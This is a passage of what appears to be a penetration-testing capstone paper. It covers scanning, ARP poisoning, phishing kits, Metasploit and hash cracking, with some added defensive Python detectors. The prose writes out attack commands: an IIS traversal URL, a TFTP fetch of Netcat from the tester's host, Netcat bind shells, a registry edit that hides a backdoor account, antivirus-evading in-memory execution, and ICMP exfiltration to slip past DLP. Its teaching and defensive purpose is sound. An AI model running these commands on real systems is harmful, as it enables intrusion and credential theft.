When a tester needs to perform discovery scanning and enumeration on a network, Nmap is the tool of choice; few if any open-source tools match its capabilities. An example of an Nmap command is: nmap -A -v -O -sC 192.168.0.16 -oG scan.txt. The nmap portion at the beginning invokes the Nmap program. The options -A, -v, -O, and -sC tell Nmap what to do against the IP address or network range: -A enables aggressive detection (OS detection, version detection, default scripts and traceroute), so -O and -sC are already implied by it, and -v increases verbosity. The -oG option selects the output format, where 'o' stands for output and 'G' for greppable, a one-line-per-host format that allows grep to search for keywords within the file. The last portion, scan.txt, is the name of the file the output is written to (Lyon, 2008). Table 1, found in Appendix A, shows an example list of some basic Nmap options.

The examples above show syntax but not all the ways that the Nmap tool can be used; the tool's documentation shows its true versatility in a variety of scenarios. Depending on what the tester is trying to achieve, there are multiple ways to run Nmap. To perform a basic ping scan of a network or range of IP addresses, the following command can be used: nmap -sP -n 10.0.0.1-254 (Lyon, 2008).

The -sP option asks Nmap to probe the IP addresses to determine whether the devices are online (in current Nmap versions -sP is an older alias for -sn, host discovery only), and -n tells Nmap not to attempt reverse DNS resolution. Because Nmap gathers very little data during this scan, it is fast. To gather more data, a tester can replace -sP with -sT, a TCP connect scan that checks the most common TCP ports on each device. This is where port scanning comes into play (Lyon, 2008).

Port scanning is critical after initial discovery has been completed. As an example, if a ping scan was performed and only one IP address was found to be online, the next step is to enumerate that device. To choose which ports are scanned, the -p option is used; to scan the entire range of ports on the device, the option is -p-. Once the tester knows which ports are open, Nmap can be run with the -sV option, which tells it to determine the version of the service running on each open port. Depending on the version of the running service, there could be known exploitable vulnerabilities. The difficulty with intranet scanning is the risk of getting caught by an IDS or IPS. One basic method of reducing that risk is an Address Resolution Protocol (ARP) scan: on a local Ethernet segment, Nmap sends ARP requests for each address instead of IP packets, which identifies the live devices without ever sending them a TCP or ICMP probe and produces nothing that an IDS watching IP traffic beyond the segment would see. Nmap uses ARP discovery automatically on a directly connected network; the -PR option requests it explicitly. There are multiple ways of performing these steps in Nmap, and there are more Nmap options available to assist in discovery and enumeration while remaining stealthy (Lyon, 2008).
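The discovery-then-enumeration sequence above (scan, read the -oG file, re-scan only the open ports with -sV), as an added Python example that is not from this capstone or from the Nmap project. The greppable output below is constructed to match the format Nmap writes (one Host: line per host, port entries as port/state/protocol/owner/service/rpc/version/); the hosts, ports and version strings are invented.

```python
import re

# Constructed greppable (-oG) output in the format `nmap -sV -oG scan.txt` writes; not a real scan.
SAMPLE_OG = (
    "# Nmap 7.80 scan initiated as: nmap -sV -oG scan.txt 10.0.0.0/29\n"
    "Host: 10.0.0.1 ()\tStatus: Up\n"
    "Host: 10.0.0.1 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.4 (protocol 2.0)/, "
    "80/open/tcp//http//Apache httpd 2.4.6/, 443/closed/tcp//https///\tIgnored State: filtered (997)\n"
    "Host: 10.0.0.5 (fileserver.corp.local)\tStatus: Up\n"
    "Host: 10.0.0.5 (fileserver.corp.local)\tPorts: 139/open/tcp//netbios-ssn//Samba smbd 3.X - 4.X/, "
    "445/open/tcp//microsoft-ds//Samba smbd 4.9.5/\tIgnored State: closed (998)\n"
    "# Nmap done at Fri May 29 10:00:00 2020 -- 8 IP addresses (2 hosts up) scanned in 12.34 seconds\n"
)

HOST_LINE = re.compile(r"Host: (\S+) \(([^)]*)\)\t(.*)")


def parse_greppable(text: str) -> dict:
    """Parse -oG output into {ip: {"hostname": str, "ports": [dict, ...]}}."""
    hosts = {}
    for line in text.splitlines():
        match = HOST_LINE.match(line)
        if not match:
            continue                       # comment lines and anything else are skipped
        ip, hostname, rest = match.groups()
        entry = hosts.setdefault(ip, {"hostname": hostname, "ports": []})
        for field in rest.split("\t"):
            if not field.startswith("Ports: "):
                continue                   # "Status:" and "Ignored State:" carry no port data
            for item in field[len("Ports: "):].split(", "):
                # Seven slash-separated fields plus the trailing slash: owner and rpc are unused here.
                port, state, proto, _owner, service, _rpc, version, _ = item.split("/", 7)
                entry["ports"].append({"port": int(port), "state": state, "proto": proto,
                                       "service": service, "version": version})
    return hosts


def open_ports(hosts: dict, ip: str) -> list:
    """Sorted list of open port numbers for one host."""
    return sorted(p["port"] for p in hosts[ip]["ports"] if p["state"] == "open")


def version_scan_command(hosts: dict, ip: str):
    """The follow-up the text describes: re-scan only the ports found open with -sV."""
    ports = open_ports(hosts, ip)
    if not ports:
        return None
    return f"nmap -sV -p {','.join(str(p) for p in ports)} {ip}"


if __name__ == "__main__":
    parsed = parse_greppable(SAMPLE_OG)
    for ip in parsed:
        print(ip, parsed[ip]["hostname"] or "-", open_ports(parsed, ip), version_scan_command(parsed, ip))
```

Restricting the version scan to the ports already known to be open keeps the second pass short and noisy only where it has to be, which matters for the IDS considerations discussed next.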

In order to avoid detection by an IDS or IPS on an intranet, an attacker needs to blend in with normal traffic. When scanning a network, it is important to limit the rate of packets sent from the tester's computer so the activity looks more like normal traffic than a scan of the network (Allen & Cardwell, 2016). Nmap can throttle its timing, spoof the source IP address and MAC address, fragment packets, and change other packet parameters. Using a combination of the Nmap options in Table 2, found in Appendix A, will assist in stealth scanning (Beggs, 2017).

Depending on the situation, poisoning ARP caches is a viable way to perform attacks that give the penetration tester information that can be used to compromise a system or network. The tool Cain and Abel can perform ARP poisoning after the pen tester has placed their NIC or WNIC in promiscuous mode and obtained a list of devices by sniffing the traffic on the network. After obtaining the list of devices, the tester determines which host they want to impersonate and filters the sniffing tool to show only that device's traffic. Cain and Abel performs a man-in-the-middle attack by sending the victim machine unsolicited ARP replies that map the default gateway's IP address to the tester's MAC address, and sending the default gateway ARP replies that map the victim's IP address to the tester's MAC address. At this point, the victim machine thinks the pen tester is the default gateway and the default gateway thinks the penetration tester is the victim machine, so the traffic between them flows through the tester's machine. Cain and Abel forwards the packets so that the victim keeps working, captures them, and analyzes them for credentials, PII, and other sensitive information (Sanders, 2017). Figure 3, found in Appendix B, shows a graphical representation of an ARP table before and after ARP poisoning.

Another popular packet sniffing tool is Wireshark. When trying to sniff a network, it is easiest to be on a hub network instead of a switched network. A hub operates at the physical layer (layer 1) of the OSI model and repeats every frame out of every port, so a sniffer sees all the traffic. A switch operates at the data link layer (layer 2) and forwards each frame only out of the port where it learned the destination MAC address, so a sniffer on another port sees only broadcast traffic and its own. Poisoning the ARP caches of the other hosts on the LAN, so that they resolve the default gateway's IP address to the tester's MAC address, forces their outbound traffic through the tester's computer and recreates, for the poisoned hosts, what a hub would have given for free. The tester's machine must then forward the packets between the victims and the rest of the intranet, either with IP forwarding enabled in the operating system or with the poisoning tool doing the forwarding; Wireshark itself does not route, it only captures. As the packets pass through, Wireshark records them and, just like Cain and Abel, can analyze the capture offline for credentials, keys, and any other sensitive information (Ali, Allen, & Heriyanto, 2014).
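The defensive counterpart of the two ARP poisoning descriptions above, as an added Python example that is not from this capstone, from Cain and Abel or from Wireshark: a check that a blue team (or the tester verifying that the poisoning is visible) can run over the ARP replies seen on a segment. The observations below are constructed; the two signatures it looks for are an IP address whose MAC changes and a single MAC that claims the gateway together with another host, which is exactly the position the attack above creates.

```python
from collections import defaultdict

# Constructed ARP observations (sender IP, sender MAC, seconds since capture start), as a
# sniffer on the segment would record them from ARP replies; not a real capture.
SAMPLE_ARP = [
    ("10.0.0.1", "00:11:22:33:44:01", 0.0),   # the real default gateway announces itself
    ("10.0.0.7", "00:11:22:33:44:07", 0.5),   # victim workstation
    ("10.0.0.9", "00:11:22:33:44:09", 1.0),   # unrelated host
    ("10.0.0.1", "de:ad:be:ef:00:01", 5.0),   # attacker claims the gateway's IP
    ("10.0.0.7", "de:ad:be:ef:00:01", 5.1),   # attacker claims the victim's IP
    ("10.0.0.1", "de:ad:be:ef:00:01", 7.0),   # poison repeated to keep the caches stale
]


def detect_arp_spoofing(observations, gateway_ip):
    """Return (severity, message) alerts for the two signatures of ARP cache poisoning:
    an IP whose MAC changes, and one MAC claiming the gateway plus another host."""
    first_mac = {}                      # ip -> MAC seen first (assumed legitimate)
    macs_for_ip = defaultdict(set)
    ips_for_mac = defaultdict(set)
    alerts = []
    for ip, mac, seconds in observations:
        mac = mac.lower()
        if ip in first_mac and mac not in macs_for_ip[ip]:
            severity = "high" if ip == gateway_ip else "medium"
            alerts.append((severity, f"{ip} moved from {first_mac[ip]} to {mac} at t={seconds}s"))
        first_mac.setdefault(ip, mac)
        macs_for_ip[ip].add(mac)
        ips_for_mac[mac].add(ip)
    for mac, ips in ips_for_mac.items():
        if gateway_ip in ips and len(ips) > 1:
            others = sorted(ips - {gateway_ip})
            alerts.append(("high", f"{mac} claims gateway {gateway_ip} and {others}: man-in-the-middle position"))
    return alerts


if __name__ == "__main__":
    for severity, message in detect_arp_spoofing(SAMPLE_ARP, "10.0.0.1"):
        print(severity.upper(), message)
```

Treating the first MAC seen for an address as legitimate is an assumption that holds only if the capture started before the poisoning; on a production segment the expected gateway MAC should be pinned from the switch configuration or DHCP records instead.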

Network scanning and device enumeration is key during the early stages of a penetration

test and security analysis. When the network has been scanned and devices have been

footprinted, vulnerability scanning is an appropriate next step, and there are tools to assist a

tester during this stage. The OpenVAS tool is a collection of security tools that perform

vulnerability management functions. It was developed for a client-server architecture, where the

clients request vulnerability scans from the server that performs the scans. Because OpenVAS is

modular, multiple scans can run simultaneously (Ali, Allen, & Heriyanto, 2014).


During preparation for an attack, reconnaissance is required to learn about the targets. The discovery and enumeration phases draw on competitive intelligence and involve internal and external scanning, which in a penetration test is authorized by the rules of engagement.

Exploitation and gaining access. Gaining access to target devices requires the

exploitation of vulnerabilities found during the discovery and enumeration phases. There are two

main classifications of attacks. The first is a direct attack where a target network’s vulnerabilities

are exploited to gain access to potentially critical systems, or to obtain information that can be

used to launch indirect attacks. The second is an indirect attack, which occurs when an attacker

uses sequential attacks to compromise the target/s. An example of this is spear phishing and

waterholing attacks (Sood & Enbody, 2014).

Patel (2013) references the Social Engineering Toolkit (SET), which is installed by

default on the Kali Linux distribution and is a diverse toolset for social engineering attacks. The

toolkit is capable of both creating emails, malicious attachments and creating/hosting phishing

web pages, also known as a web attack vector. SET contains a mass-emailing option where a

penetration tester can send a phishing email to many email addresses within an organization at

once (Patel, 2013).

The SET has a list of website templates that can be used as a web attack vector, but it is

also capable of cloning websites when a URL is provided. The tool performs a get request and

grabs the HTML code of the website, performing the cloning process based on that information.

Using tools like SET assists in testing the employees of an organization and their ability to recognize phishing email attempts. If a user were to give up their login credentials of a website,

such as their work Office 365 login, the penetration tester would have the user’s credentials for

their organization. If the user had administrative permissions, either locally on their computer or


on the domain, the penetration tester will be able to utilize those credentials to gain access to the

organization’s network (Patel, 2013).

When looking for information on a machine or for ways to access it, enum4linux is a great tool for enumerating Windows and Samba hosts over the Server Message Block (SMB) and RPC services, with limited Lightweight Directory Access Protocol (LDAP) queries against domain controllers. Using valid non-administrative or administrative credentials, it is possible to find an accessible SMB share and, depending on the permissions, find a share that can be modified or even used to execute remote commands. If a domain controller is enumerated, the penetration tester can obtain a list of all Active Directory (AD) users, groups, devices and shares. This step belongs to enumeration and/or post-exploitation. If the tester has no username and password, it is still possible, through a null session, to find shares and information open to the AD group 'Everyone'. The 'Everyone' group can be an AD or local group and grants anyone access to the resource it is assigned to, regardless of whether they have an AD account. Where a file share grants access to 'Everyone', a tester can enumerate and access it with enum4linux without credentials. If the tester has already compromised a workstation and/or holds credentials, those credentials can be used to discover and access more shares on the network, depending on the permissions of the compromised account. Output of the enum4linux help page can be found in Figure 4, located in Appendix B (Velu, 2017).

In the realm of exploitation, Metasploit is the most commonly used tool for executing

exploits against known vulnerabilities. There are two versions of Metasploit, Metasploit Pro

which is the paid version and requires a license, and Metasploit Framework which is a free

version and is automatically installed in all Kali Linux distributions. “Metasploit is currently the

world's leading penetration-testing tool, and one of the biggest open-source projects in


information security and penetration testing. It has totally revolutionized the way we can perform

security tests on our systems” (Teixeira, Singh, & Agarwal, 2018, p. 8). Rapid7, which is a

managed security services provider (MSSP) and security product vendor, owns Metasploit Pro

and Framework (Condon, 2019).

The Metasploit Framework (MSF) is organized into directories of modules. Each directory holds modules that serve a specific purpose: auxiliary functions such as scanning, exploitation, payloads, or post-exploitation. When a penetration tester is trying to gain access to a device, the extensive library of exploitation modules in the Metasploit Framework is second to none, and the module database is constantly updated. The command for updating a source installation of MSF is 'msfupdate'; on Kali Linux the framework is packaged, so it is updated with the package manager (apt) instead. The tool can also be installed on Windows and macOS (Teixeira, Singh, & Agarwal, 2018).

Metasploit Framework modules are executed using the ‘use’ command and adding the

path of the module that is needed. MSF users can perform keyword searches of modules by

typing ‘search’ and then the keyword they are looking for. An example is typing

‘search SQL’ and hitting enter, which will list all of the modules that include SQL in the

name or in the description of the module. When executing modules, the settings of the module

need to be set before entering the command ‘run’. See Figure 5, located in Appendix B, for an

example of setting and executing a Metasploit module (Teixeira, Singh, & Agarwal, 2018).

Persistence and spreading. Spreading across the network includes gaining access to

other servers, workstations and whole networks once the penetration tester has gained access to

one or more devices. Persistence involves setting up a backdoor into the machine or machines for

future access.


EC-Council (2017) references Netcat in the book Ethical Hacking and Countermeasures: Web Application and Data Servers. The Netcat chapter of the book provides the reader with steps to set up a backdoor on a compromised computer, transferring Netcat to the target either with TFTP or through an injected URL. An example is sending a vulnerable IIS web server the following URL: http://192.168.0.1/scripts/...%255c./winnt/system32/cmd.exe?/c+dir+c:\ (EC-Council, 2017). The URL uses a directory traversal flaw in old IIS versions to run Windows' cmd.exe and show the attacker the directory listing of the C drive. Once the pen tester can run commands on the target this way, the Windows tftp client can be used to pull Netcat from a TFTP server on the tester's machine onto the Internet Information Services (IIS) server, using the following command: http://<attacker’sIP>/c+TFTP+i+192.168.0.1+GET+nc.exe (EC-Council, 2017).

The command asks the tester's computer for nc.exe, which is Netcat, and saves it on the IIS server. Once Netcat is on the IIS server, it can be executed as a backdoor that listens on a specific port for connections from the attacker's computer. An example of such a command is nc -L -p 12345 -d -e cmd.exe. Respectively, the options mean: -L, listen and keep listening for new connections after a client disconnects; -p 12345, listen on port 12345; -d, detach from the console so the listener runs in the background without a visible window; and -e cmd.exe, attach cmd.exe to the connection so that the attacker gets a command prompt (EC-Council, 2017).

If there is a file share that is open, or if the penetration tester accessed a file share with

‘modify’ permissions, it is possible to import Netcat to the target device and execute a remote

shell. Once the penetration tester has accessed the target devices file share, the pen tester runs

one the following command on a Windows machine; nc -l -p 6996 -e cmd.exe. For a Linux

machine, the command is the same with the exception of cmd.exe, which is replaced with

/bin/bash. The command nc calls Netcat, the -l mean listen, -p 6996 means port 6996, -e cmd.exe

means to execute the mentioned file. This initiates Netcat to listen on the port and execute the

Page 32: Penetration Testing Methodologies by Mathew Stuart A Capstone … · 2020. 5. 29. · Web Application Testing ... Offensive security knowledge falls under advanced cybersecurity concepts

26

terminal or command prompt. Since Netcat is listening on port 6996 and would run the

commands it receives in the OS’s command line interface (CLI), the penetration tester would run

the following command on their device: nc <target IP> 6996. This initiates a Netcat connection

between the tester’s machine and the target machine (Yerrid, 2013).

Because IIS can have remote code execution vulnerabilities, depending on the version of

IIS running, the penetration tester could utilize the Netcat tool to gain access to the server and

establish a hidden persistence on a vulnerable server as part of a penetration test. This only gives

the tester the same permissions as the application running, thus a privilege escalation might be

required to gain administrative access to the Windows server (EC-Council, 2017).

Mimikatz is a well-known tool that can perform a multitude of functions to assist in

escalating privileges, gaining initial access, and gaining additional active directory information

regarding user accounts and group policies. Mimikatz is also known for its ability to perform the

infamous pass-the-hash function which exploits a vulnerability in the original NTLM that

required only the hash of the password to be correct instead of the password itself when

authenticating to Windows devices. It is important not only to understand how NTLM functions

and what tools can exploit its vulnerabilities, but also how to use the tool, which is essential for

a penetration tester, and that is why the author gives several other examples of the tool’s use in real

scenarios (Sharma, 2017).

Clercq (2004) and Halton & Weaver (2016) explain the differences between LM, NT,

NTLMv1 and NTLMv2 hashes, and the tool syntax for John the Ripper and Hashcat for cracking

the mentioned hashes. Halton & Weaver (2016) explained the history of each hash and reviewed

steps for cracking the credentials in detail. NT hashes are the oldest hashes used for Windows to

authenticate to a domain and are more easily cracked due to their age and simplistic algorithm.


NTLM, also known as NTHash, is a little harder to crack, and is standard on most modern

Windows machines. Luckily, cracking this hash is not always necessary. NTLM’s most notable

vulnerability is the pass-the-hash technique where an attacker can simply sniff the hash and send

the hashed password to a device for authentication. The device will query the domain controller

with the hash to make sure the hashes match. If the hashes match, then the credentials are accepted.

LM and NT are ways that Windows devices store passwords on the machine itself.

The commands to crack LM hashes utilizing Hashcat and JTR are as follows (the captured hashes are in hashes.txt and the dictionary in wordlist.txt):

Hashcat = hashcat -m 3000 -a 0 hashes.txt wordlist.txt (Steube, 2019)

John the Ripper = john --format=lm --wordlist=wordlist.txt hashes.txt (Halton & Weaver, 2016)

The commands for cracking NTHash using Hashcat and JTR are as follows:

John the Ripper = john --format=nt --wordlist=wordlist.txt hashes.txt (Halton & Weaver, 2016)

Hashcat = hashcat -m 1000 -a 0 hashes.txt wordlist.txt (Steube, 2019).

NTLMv1, also known as Net-NTLM, is a protocol that allows Windows machines to

authenticate to a domain. This is an older version of domain authentication and is now

deprecated, but older networks or networks with older hardware/software may still be using this

version. NTLMv2 is the more secure version and has been the default method used since

Windows 2000 (Clercq, 2004).

The commands for cracking NTLMv1 are as follows: John the Ripper = john --format=netntlm

--wordlist=wordlist.txt hashes.txt, Hashcat = hashcat -m 5500 -a 0 hashes.txt wordlist.txt. The commands for

cracking NTLMv2 are as follows: John the Ripper = john --format=netntlmv2 --wordlist=wordlist.txt hashes.txt,

Hashcat = hashcat -m 5600 -a 0 hashes.txt wordlist.txt (Steube, 2019).
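As an added example (not code from Steube, Halton & Weaver, or the other sources cited here), the following Python maps a captured hash line to the Hashcat mode and John format listed above, and recomputes NT hashes to audit accounts against a weak-password list, which is also why a captured NT hash works directly in pass-the-hash: the hash itself is the secret. The sample lines, account names and domain are constructed.

```python
"""Windows credential-hash triage: an added example for this section, not code
from the sources cited above. It (1) maps a captured line to the Hashcat -m
mode and John --format given in the text, and (2) recomputes NT hashes
(MD4 over the UTF-16LE password) to audit accounts against a weak-password
list. Sample lines are constructed."""
import re
import struct

MASK32 = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib often lacks MD4 on OpenSSL 3 builds."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    f = lambda x, y, z: (x & y) | (~x & z)           # round 1: select
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)   # round 2: majority
    p = lambda x, y, z: x ^ y ^ z                     # round 3: parity
    rounds = (
        (f, 0x00000000, (3, 7, 11, 19), range(16)),
        (g, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (p, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for fn, k, shifts, order in rounds:
            for step, idx in enumerate(order):
                # Compute the new 'a', then rotate registers: (a,b,c,d) -> (d,a',b,c)
                a, b, c, d = d, _rotl((a + fn(b, c, d) + x[idx] + k) & MASK32, shifts[step % 4]), b, c
        h = [(v + w) & MASK32 for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> str:
    """NT hash (NTHash) as stored in the SAM: MD4 of the UTF-16LE password."""
    return md4(password.encode("utf-16-le")).hex()


# Mode numbers and format names are the ones given in the text above.
HEX = "[0-9a-fA-F]"
PWDUMP = re.compile(rf"^[^:]+:\d+:({HEX}{{32}}):({HEX}{{32}}):::$")        # user:rid:LM:NT:::
NETNTLMV1 = re.compile(rf"^[^:]*::[^:]*:{HEX}{{48}}:{HEX}{{48}}:{HEX}{{16}}$")
NETNTLMV2 = re.compile(rf"^[^:]*::[^:]*:{HEX}{{16}}:{HEX}{{32}}:{HEX}+$")
LM_DISABLED = "aad3b435b51404eeaad3b435b51404ee"   # LM field when LM storage is off


def classify(line: str) -> list:
    """[(label, hashcat_mode, john_format), ...] for one captured line."""
    line = line.strip()
    m = PWDUMP.match(line)
    if m:
        found = [("NT", 1000, "nt")]
        if m.group(1).lower() != LM_DISABLED:   # a real LM hash is the cheapest target
            found.insert(0, ("LM", 3000, "lm"))
        return found
    if NETNTLMV1.match(line):
        return [("NetNTLMv1", 5500, "netntlm")]
    if NETNTLMV2.match(line):
        return [("NetNTLMv2", 5600, "netntlmv2")]
    return []


def weak_password_audit(pwdump_lines: list, weak_passwords: list) -> dict:
    """Accounts whose NT hash equals the hash of a listed weak password."""
    table = {nt_hash(pw): pw for pw in weak_passwords}   # hash the list once
    hits = {}
    for line in pwdump_lines:
        m = PWDUMP.match(line.strip())
        if m and m.group(2).lower() in table:
            hits[line.split(":", 1)[0]] = table[m.group(2).lower()]
    return hits


if __name__ == "__main__":
    # Constructed sample: one pwdump-style SAM line and one Net-NTLMv2 capture line.
    sample = [
        "alice:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::",
        "bob::MEGABANK:1122334455667788:" + "a" * 32 + ":0101000000000000deadbeef",
    ]
    for s in sample:
        print(classify(s))
    print(weak_password_audit(sample, ["Welcome1", "password", "Summer2020"]))
```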

Sood & Enbody (2014) explain that the process of gaining and maintaining access to a

computer often does not require a direct attack. The authors explain the principles behind the use


of phishing emails to gain access to a target machine. In the spear phishing model that the authors

present, located in Appendix B as Figure 6, the attacker sends an email to the target user, but the

email contains malicious attachment/s that will infect the target computer with a RAT (Remote

Access Trojan). A RAT provides the attacker with a backdoor into the target machine. Once the

RAT is on the target machine, it will either spread itself across the target network, or the attacker

will utilize the RAT to spread more RATs across the network (Sood & Enbody, 2014).

If the attacker is not caught by an IDS/IPS, then they will eventually find a server that

holds sensitive data as they spread the RAT across the target network, and at that point, the

attacker will have the ability to exfiltrate sensitive data in a manner which will allow the

attacker to elude detection. This completes the attack in the spear phishing method example, but

there are steps after exfiltration. One of the steps that usually follows exfiltration is covering of

tracks which includes deleting logs of the activity, removing any malware that was used to gain

access to the machine, and reversing any changes made to the machine’s configuration (Sood &

Enbody, 2014).

Another way to maintain persistence and exfiltrate data from a target device is to create a

new user account and add the account to local and domain groups. This will help the penetration

tester blend in with the rest of the activity happening on the computer. The account should be

hidden, and in order to hide the new account, the following registry edit needs to be

performed: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v account_name /t REG_DWORD /d 0 (the key path contains a space, so it is quoted). The registry

path can vary depending on the version of Windows running on the target machine, but the

general idea is the same (Velu, 2017).
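An added, defender-side example (not from Velu or the other sources cited) that flags the Netcat shell binding and the SpecialAccounts\UserList edit described above, together with the account creation and group change that precede it, in process command-line records; the log lines, host names and account names are constructed.

```python
"""Process command-line audit for the persistence techniques described above:
Netcat bound to a shell (-e cmd.exe or /bin/bash), an account hidden via the
SpecialAccounts\\UserList registry value, and the 'net user /add' and group
changes that precede it. Added example, not from the cited sources; the log
lines are constructed in a simplified 'time host user command' form, not real
Security event records."""
import re
import shlex

USERLIST_KEY = re.compile(r"\\specialaccounts\\userlist", re.IGNORECASE)
LOG_LINE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(.+)$")
NETCAT = {"nc", "nc.exe", "nc64.exe", "ncat", "ncat.exe", "netcat"}


def _argv(cmdline: str) -> list:
    """Split a Windows/Unix command line without treating backslashes as escapes."""
    try:
        return shlex.split(cmdline, posix=False)
    except ValueError:                       # unbalanced quote: fall back to whitespace
        return cmdline.split()


def _value_after(argv: list, flag: str):
    for i, arg in enumerate(argv[:-1]):
        if arg.lower() == flag:
            return argv[i + 1]
    return None


def inspect_command(cmdline: str) -> list:
    """Return human-readable findings for one process command line."""
    argv = _argv(cmdline)
    if not argv:
        return []
    exe = argv[0].strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
    lower = [a.lower() for a in argv]
    findings = []

    if exe in NETCAT:
        shell = _value_after(argv, "-e") or _value_after(argv, "-c")
        # -l / -L (and bundled forms such as -lvp) mean 'listen'; otherwise it dials out
        listening = any(a.startswith("-") and "l" in a[1:].lower() for a in argv)
        if shell:
            where = f"listening on port {_value_after(argv, '-p') or '?'}" if listening else "outbound"
            findings.append(f"netcat executing {shell!r}, {where}")

    if exe in ("reg", "reg.exe") and len(lower) > 1 and lower[1] == "add" and USERLIST_KEY.search(cmdline):
        name, data = _value_after(argv, "/v"), _value_after(argv, "/d")
        if data == "0":
            findings.append(f"account {name!r} hidden from the logon screen (UserList = 0)")
        else:
            findings.append(f"SpecialAccounts UserList entry written for {name!r}")

    if exe in ("net", "net.exe", "net1", "net1.exe") and len(lower) > 2 and "/add" in lower:
        if lower[1] == "user":
            findings.append(f"account {argv[2]!r} created via net user /add")
        elif lower[1] in ("localgroup", "group") and len(argv) > 3:
            findings.append(f"{argv[3]!r} added to group {argv[2]!r}")
    return findings


def audit_log(lines) -> list:
    """Run inspect_command over 'time host user command' lines; return findings."""
    results = []
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue
        ts, host, user, cmd = m.groups()
        for finding in inspect_command(cmd):
            results.append({"time": ts, "host": host, "user": user, "finding": finding, "cmdline": cmd})
    return results


# Constructed sample log (not real events); lines 2-5 mirror the steps described above.
SAMPLE_LOG = r"""
2020-05-01T10:00:01Z WS01 MEGABANK\jdoe C:\Windows\System32\notepad.exe report.txt
2020-05-01T10:02:13Z WS01 MEGABANK\jdoe nc.exe -L -p 12345 -d -e cmd.exe
2020-05-01T10:03:40Z WS01 MEGABANK\jdoe net user svc_helper <password> /add
2020-05-01T10:03:41Z WS01 MEGABANK\jdoe net localgroup administrators svc_helper /add
2020-05-01T10:04:02Z WS01 MEGABANK\jdoe reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v svc_helper /t REG_DWORD /d 0
2020-05-01T10:05:00Z SRV02 MEGABANK\admin reg query HKLM\SYSTEM\CurrentControlSet\Services
""".strip().splitlines()

if __name__ == "__main__":
    for hit in audit_log(SAMPLE_LOG):
        print(hit["time"], hit["host"], hit["user"], "->", hit["finding"])
```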


Data gathering and extraction. Netcat can exfiltrate data from a target device. In order

to perform this function, the Netcat remote shell needs to have a connection to the attacker’s

computer. The penetration tester also needs to know the path to the folder where the file needing

to be exfiltrated rests on the target device. In order to import the file, the ‘tail’ command is used.

For example, if a penetration tester wanted to dump the Linux passwd file, they would run the

following command: tail /etc/passwd (Yerrid, 2013). In turn, the attacker can crack the password

file offline and at their leisure.

An issue with data exfiltration is the risk of being caught by data loss prevention.

Random access memory (RAM) holds a significant amount of information for an attacker. Tools

like Belkasoft RAM Capturer and Mandiant Memoryze can capture system memory, which

allows it to be downloaded as a single image file. Both tools are uploaded to the compromised

machine and used to perform the download of the system’s memory (Velu, 2017).

If a penetration tester is trying to capture the active memory of a target, they would most

likely get caught by endpoint protection. In order to avoid this, Metasploit’s Meterpreter has

commands that can run the executable completely in the target machine’s memory using the

following command: execute -H -m -d calc.exe -f. The command runs the calculator app

(calc.exe) as a decoy executable and will upload the memory acquisition program in the system’s

memory. Because a dummy program executes the memory acquisition program, it avoids anti-virus.

The memory acquisition program does not show up as a running process because it is run

in system memory, which assists in avoiding IDS/IPS (Velu, 2017).

When exfiltrating information from a target on an organization’s domain, the security

account manager (SAM) database is a prime target. The SAM database contains the usernames

and passwords for the Windows operating system. The passwords are stored as LM or NTLM


hashes in the registry hive. The file path for the SAM is %SystemRoot%\system32\config\SAM,

and the hive is mounted in the registry at HKLM\SAM (Teixeira, Singh, & Agarwal, 2018).

Metasploit has a module called Smart Hashdump that can import the password hashes

from the SAM database to the penetration tester’s machine where the tester can crack hashes

offline. Once the meterpreter shell is running on the target device and the shell has been placed

in the background of the tester’s terminal, the tester can run the Smart Hashdump module at the

following Metasploit path: post/windows/gather/smart_hashdump. Once the module settings

have been set and the module has finished running, the Windows password hashes are placed

into a file on the tester’s machine (Teixeira, Singh, & Agarwal, 2018).

Lastly, there is the data exfiltration toolkit (DET), which is a tool designed to test data

loss prevention (DLP). DET can exfiltrate data using different protocols and social media such as

Gmail and Twitter. DET uses a client-server architecture, so a server needs to be set up on the

tester’s machine and then a client needs to be installed on the target machine. Velu (2016)

provides the steps for downloading and configuring the DET tool for use. The tool is

downloaded from GitHub using the command ‘git clone https://github.com/sensepost/DET.git’.

Once the repository is cloned and the tester has navigated to the directory, the tester can use the

command ‘pip install -r requirements.txt’ and then the command ‘python det.py’ to complete the

installation of the tool. This is necessary because DET is not installed on Kali Linux by default

(Velu, 2017).

The tester can start the DET server using the following command: python det.py -c

./config-sample.json -p icmp -L. This command starts the server with the configuration set to

listen for packets over Internet control message protocol (ICMP). The config-sample.json in the

command is the configuration file. Once the setup is complete, the tester can exfiltrate data from


the target over the ICMP protocol, which will obfuscate the traffic by making it look like a ping,

which helps evade DLP (Velu, 2017).
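Added example, not from Velu or the other cited sources: a baseline check that separates stock ping traffic from ICMP echo requests carrying encoded data, which is the gap the ICMP mode just described relies on. The packets, hosts and payload templates are constructed (the templates are simplified to a default Windows and a default Linux ping).

```python
"""ICMP echo-request baseline check: an added, defender-side example for the
DLP gap described above (exfiltration over ICMP that 'looks like a ping').
Not from the cited sources. Packets are constructed (src, dst, icmp_type,
payload) tuples; in practice they would come from a pcap or sensor feed."""
import base64
import math
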